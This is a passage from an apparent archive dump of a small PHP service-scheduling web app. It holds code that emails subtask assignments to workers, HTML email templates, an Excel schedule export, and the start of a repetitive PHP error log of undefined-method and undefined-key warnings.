Ensure this file contains your sendEmail function require_once '../Classes/Database.php'; // Adjust path as per your project structure require_once '../Service/SubtaskService.php'; // Adjust path as per your project structure require_once '../Service/TaskService.php'; use PHPMailer\PHPMailer\Exception; use PHPMailer\PHPMailer\PHPMailer; use PHPMailer\PHPMailer\SMTP; if ($_SERVER['REQUEST_METHOD'] === 'POST') { $data = json_decode(file_get_contents("php://input"), true); $action = isset($data['action']) ? $data['action'] : null; $email = isset($data['worker_email']) ? $data['worker_email'] : null; $subtaskIds = isset($data['subtask_ids']) ? $data['subtask_ids'] : []; $subtaskService = new SubtaskService(); $errors = []; $successes = []; if ($action === 'single') { $subtaskId = isset($data['subtask_id']) ? $data['subtask_id'] : null; if ($subtaskId !== null) { $subtask = $subtaskService->getSubtaskById($subtaskId); if ($subtask) { // Load email template for single subtask $templatePath = 'email_templates/subtask_email_template.html'; $emailTemplate = file_get_contents($templatePath); // Replace placeholders with subtask data $placeholders = [ "Recipient's Name" => $email, 'Service Name' => $subtask->service_name, 'Date' => $subtask->date, 'Time' => $subtask->time, 'taskFormLink' => $base_url.'/pages/subtaskform.php?subtask_id=' . $subtask->id, ]; foreach ($placeholders as $key => $value) { $emailTemplate = str_replace("[$key]", $value, $emailTemplate); } // Send email $result = sendEmail($email, "New Task Assigned: " . $subtask->service_name, $emailTemplate); if (strpos($result, 'Email sent') !== false) { $successes[] = "Email sent to $email for subtask ID $subtaskId"; // Update database after successful email $updateResult = $subtaskService->updateSubtaskStatusAfterMessage($subtaskId, $email, 'success'); if ($updateResult) { $successes[] = "Database updated for subtask ID $subtaskId"; } else { $errors[] = "Failed to update database for subtask ID $subtaskId"; } } else { $errors[] = "Failed to send email to $email for subtask ID $subtaskId: $result"; } } else { $errors[] = "Subtask not found for ID $subtaskId"; } } else { $errors[] = "Missing subtask ID for single action"; } } elseif ($action === 'bulk') { foreach ($subtaskIds as $subtaskId) { $subtask = $subtaskService->getSubtaskById($subtaskId); // Check if taskAssigned is true $taskService = new TaskService(); $isTaskAssigned = $taskService->isTaskAssignedAndAccepted($subtask->id); if (!$isTaskAssigned) { echo json_encode(['status' => 'error', 'message' => 'Please assign the task before sending a subtask to the cleaner.']); exit; } if ($subtask) { // Load email template for bulk subtasks $templatePath = 'email_templates/subtask_email_template.html'; $emailTemplate = file_get_contents($templatePath); // Replace placeholders with subtask data $placeholders = [ "Recipient's Name" => $email, 'Service Name' => $subtask->service_name, 'Date' => $subtask->subtask_date, 'Time' => date("g:i A", strtotime($subtask->subtask_time)), 'taskFormLink' => $base_url.'/pages/subtaskform.php?subtask_id=' . $subtask->id, ]; foreach ($placeholders as $key => $value) { $emailTemplate = str_replace("[$key]", $value, $emailTemplate); } // Send email $result = sendEmail($email, "New Task Assigned: " . $subtask->service_name, $emailTemplate); if (strpos($result, 'Email sent') !== false) { $successes[] = "Email sent to $email for subtask ID $subtaskId"; // Update database after successful email $updateResult = $subtaskService->updateSubtaskStatusAfterMessage($subtaskId, $email, 'success'); if ($updateResult) { $successes[] = "Database updated for subtask ID $subtaskId"; } else { $errors[] = "Failed to update database for subtask ID $subtaskId"; } } else { $errors[] = "Failed to send email to $email for subtask ID $subtaskId: $result"; } } else { $errors[] = "Subtask not found for ID $subtaskId"; } } } else { $errors[] = "Invalid action parameter: $action"; } if (empty($errors)) { echo json_encode(['status' => 'success', 'message' => $successes]); } else { echo json_encode(['status' => 'partial', 'successes' => $successes, 'errors' => $errors]); } } else { echo json_encode(['status' => 'error', 'message' => 'Invalid request method']); } ?> emailUtils.php000064400000002456151676701240007405 0ustar00isSMTP(); $mail->Host = 'localhost'; $mail->SMTPAuth = false; $mail->SMTPAutoTLS = false; $mail->Port = 25; // Recipients $mail->setFrom('mail@emerateamkids.com', 'emerateamkids.com'); // Replace with your GoDaddy email and name $mail->addAddress($to); // Load and process HTML email template if provided if ($template) { $emailTemplate = file_get_contents($template); foreach ($placeholders as $key => $value) { $emailTemplate = str_replace("[$key]", $value, $emailTemplate); } $body = $emailTemplate; } // Content $mail->isHTML($isHTML); $mail->Subject = $subject; $mail->Body = $body; $mail->send(); return "Email sent to $to"; } catch (Exception $e) { return "Message could not be sent. Mailer Error: {$mail->ErrorInfo}"; } } ?> email_templates/password_reset_template.html000064400000005162151676701240015553 0ustar00 Password Reset Request
Company Logo

Dear [Recipient's Name],

We received a request to reset the password associated with this email address. If you made this request, please click the button below to reset your password:

Reset Password

If you did not request a password reset, please ignore this email. Your account will remain secure and no changes will be made.

For security reasons, the link will expire in [expiration time, e.g., 24 hours]. If you need further assistance, please do not hesitate to contact our support team.

email_templates/task_email_template.html000064400000004324151676701240014617 0ustar00 Service Confirmation Request
Company Logo

Dear [Recipient's Name],

Please find the attached details for the upcoming service, including the service location, dates, and frequency.

Service Location: [Service Location Name]

Dates: [Dates]

Frequency: [Frequency]

Fill out the form

email_templates/subtask_email_template.html000064400000004243151676701240015331 0ustar00 Service Confirmation Request
Company Logo

Dear [Recipient's Name],

Please find the attached details for the upcoming service, including the date, time, and location:

Service Location: [Service Name]

Date: [Date]

Time: [Time]

Fill out the form

emeraadmin/export_schedule.php000064400000014543151676701240012574 0ustar00getConn(); // SQL query to fetch tasks with subtask dates and times formatted $sql = " SELECT srv.name AS service_name, srv.region, t.frequency, st.subtask_date, st.completed, st.ignored FROM tasks t JOIN subtasks st ON t.id = st.task_id JOIN services srv ON t.service_id = srv.id WHERE t.schedule_id = :schedule_id ORDER BY srv.name, srv.region, t.frequency, st.subtask_date "; $stmt = $pdo->prepare($sql); $stmt->bindValue(':schedule_id', $scheduleId, PDO::PARAM_INT); $stmt->execute(); $tasks = $stmt->fetchAll(PDO::FETCH_ASSOC); // Create a new Spreadsheet object $spreadsheet = new Spreadsheet(); $sheet = $spreadsheet->getActiveSheet(); // Set headers or titles in the Excel sheet $sheet->setCellValue('A1', 'Service Name'); $sheet->setCellValue('B1', 'Region'); $sheet->setCellValue('C1', 'Frequency'); // Get all distinct subtask dates $distinctDates = []; foreach ($tasks as $task) { $distinctDates[] = $task['subtask_date']; } $distinctDates = array_unique($distinctDates); sort($distinctDates); // Set dates as headers in the Excel sheet $col = 'D'; foreach ($distinctDates as $date) { $sheet->setCellValue($col . '1', $date); $sheet->getColumnDimension($col)->setWidth(15); // Set width to 15 $col++; } // Populate tasks data into Excel $row = 2; $taskGroups = []; foreach ($tasks as $task) { $taskKey = $task['service_name'] . '-' . $task['region'] . '-' . $task['frequency']; if (!isset($taskGroups[$taskKey])) { $taskGroups[$taskKey] = [ 'service_name' => $task['service_name'], 'region' => $task['region'], 'frequency' => $task['frequency'], 'subtasks' => [] ]; } $taskGroups[$taskKey]['subtasks'][$task['subtask_date']] = ['completed' => $task['completed'], 'ignored' => $task['ignored']]; } foreach ($taskGroups as $taskGroup) { $sheet->setCellValue('A' . $row, $taskGroup['service_name']); $sheet->setCellValue('B' . $row, $taskGroup['region']); $sheet->setCellValue('C' . $row, $taskGroup['frequency']); // Populate subtask statuses $col = 'D'; foreach ($distinctDates as $date) { $value = ''; $styleArray = null; if (isset($taskGroup['subtasks'][$date])) { $completed = $taskGroup['subtasks'][$date]['completed']; $ignored = $taskGroup['subtasks'][$date]['ignored']; if ($ignored) { $value = 'Ignored'; $styleArray = [ 'fill' => [ 'fillType' => Fill::FILL_SOLID, 'color' => ['rgb' => 'FFFF00'] ], 'font' => [ 'color' => ['rgb' => '9C6500'] ] ]; } elseif ($completed) { $value = 'Completed'; $styleArray = [ 'fill' => [ 'fillType' => Fill::FILL_SOLID, 'color' => ['rgb' => 'C6EFCE'] ], 'font' => [ 'color' => ['rgb' => '006100'] ] ]; } else { $value = 'Not Completed'; $styleArray = [ 'fill' => [ 'fillType' => Fill::FILL_SOLID, 'color' => ['rgb' => 'FFC7CE'] ], 'font' => [ 'color' => ['rgb' => '9C0006'] ] ]; } } // Set value in corresponding cell $cellCoordinate = $col . $row; $sheet->setCellValue($cellCoordinate, $value); // Apply style if applicable if ($styleArray) { $sheet->getStyle($cellCoordinate)->applyFromArray($styleArray); } $col++; } $row++; } // Set column widths (optional) $sheet->getColumnDimension('A')->setWidth(25); // Adjust width as needed $sheet->getColumnDimension('B')->setWidth(20); $sheet->getColumnDimension('C')->setWidth(15); // Set headers for Excel file download header('Content-Type: application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'); header('Content-Disposition: attachment;filename="schedule_export_' . date('Y-m-d') . '.xlsx"'); header('Cache-Control: max-age=0'); // Save Excel file to PHP output (browser will download it) $writer = new Xlsx($spreadsheet); $writer->save('php://output'); } // Check if schedule_id is provided via GET request if ($_SERVER['REQUEST_METHOD'] === 'GET' && isset($_GET['schedule_id'])) { $scheduleId = $_GET['schedule_id']; try { // Export schedule to Excel and initiate download exportScheduleToExcel($scheduleId); exit; // Stop further execution after file download } catch (Exception $e) { // Handle exceptions (e.g., database errors, file saving errors) echo 'Error: ' . $e->getMessage(); } } else { // Handle case where schedule_id parameter is missing echo 'Error: Schedule ID parameter missing.'; } ?> emeraadmin/error_log000064400003713461151676701240010613 0ustar00[15-Jul-2024 10:40:28 UTC] PHP Fatal error: Uncaught Error: Call to undefined method TaskService::getAllIncompletedSubtaksGroupByDate() in /home/ftmgc76wdee4/public_html/pages/emeraadmin/submitsubtaskmanually.php:24 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/emeraadmin/submitsubtaskmanually.php on line 24 [15-Jul-2024 10:40:59 UTC] PHP Fatal error: Uncaught Error: Call to undefined method TaskService::getAllIncompletedSubtaksGroupByDate() in /home/ftmgc76wdee4/public_html/pages/emeraadmin/submitsubtaskmanually.php:24 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/emeraadmin/submitsubtaskmanually.php on line 24 [15-Jul-2024 10:42:22 UTC] PHP Warning: Undefined property: stdClass::$submitted_by_admin in /home/ftmgc76wdee4/public_html/pages/emeraadmin/viewsubtask.php on line 171 [15-Jul-2024 10:42:48 UTC] PHP Warning: Undefined property: stdClass::$submitted_by_admin in /home/ftmgc76wdee4/public_html/pages/emeraadmin/viewsubtask.php on line 171 [15-Jul-2024 10:44:23 UTC] PHP Warning: Undefined property: stdClass::$submitted_by_admin in /home/ftmgc76wdee4/public_html/pages/emeraadmin/viewsubtask.php on line 171 [16-Jul-2024 14:22:54 UTC] PHP Fatal error: Uncaught Error: Call to undefined method TaskService::getAllSubtasksWithNotesGroupByDate() in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaskswithnotes.php:30 Stack trace: #0 {main} thrown in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaskswithnotes.php on line 30 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key "ignored" in /home/ftmgc76wdee4/public_html/pages/emeraadmin/report_subtaks_datewise.php on line 201 [18-Jul-2024 21:17:37 Australia/Sydney] PHP Warning: Undefined array key 